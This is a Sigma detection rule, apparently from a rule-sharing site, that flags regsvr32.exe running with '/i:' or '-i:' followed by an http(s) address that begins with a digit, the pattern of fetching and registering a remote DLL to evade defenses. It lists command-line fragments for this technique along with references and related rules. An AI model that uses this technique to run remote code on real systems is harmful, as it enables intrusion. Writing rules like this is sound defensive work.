Potentially Suspicious Regsvr32 HTTP IP Pattern

 1title: Potentially Suspicious Regsvr32 HTTP IP Pattern
 2id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8
 3status: test
 4description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
 5references:
 6    - https://twitter.com/mrd0x/status/1461041276514623491
 7    - https://twitter.com/tccontre18/status/1480950986650832903
 8    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
 9author: Florian Roth (Nextron Systems)
10date: 2022-01-11
11modified: 2023-05-24
12tags:
13    - attack.defense-evasion
14    - attack.t1218.010
15logsource:
16    category: process_creation
17    product: windows
18detection:
19    selection_img:
20        - Image|endswith: '\regsvr32.exe'
21        - OriginalFileName: 'REGSVR32.EXE'
22    selection_ip:
23        CommandLine|contains:
24            - ' /i:http://1'
25            - ' /i:http://2'
26            - ' /i:http://3'
27            - ' /i:http://4'
28            - ' /i:http://5'
29            - ' /i:http://6'
30            - ' /i:http://7'
31            - ' /i:http://8'
32            - ' /i:http://9'
33            - ' /i:https://1'
34            - ' /i:https://2'
35            - ' /i:https://3'
36            - ' /i:https://4'
37            - ' /i:https://5'
38            - ' /i:https://6'
39            - ' /i:https://7'
40            - ' /i:https://8'
41            - ' /i:https://9'
42            - ' -i:http://1'
43            - ' -i:http://2'
44            - ' -i:http://3'
45            - ' -i:http://4'
46            - ' -i:http://5'
47            - ' -i:http://6'
48            - ' -i:http://7'
49            - ' -i:http://8'
50            - ' -i:http://9'
51            - ' -i:https://1'
52            - ' -i:https://2'
53            - ' -i:https://3'
54            - ' -i:https://4'
55            - ' -i:https://5'
56            - ' -i:https://6'
57            - ' -i:https://7'
58            - ' -i:https://8'
59            - ' -i:https://9'
60    condition: all of selection_*
61falsepositives:
62    - FQDNs that start with a number such as "7-Zip"
63level: high

References

• x.com

  
  Read More

• x.com

  
  Read More

• Regsvr32 on LOLBAS

  

  Regsvr32.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.

  
  Read More

Related rules

• DNS Query Request By Regsvr32.EXE
• HTML Help HH.EXE Suspicious Child Process
• Network Connection Initiated By Regsvr32.EXE
• Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
• Potential EmpireMonkey Activity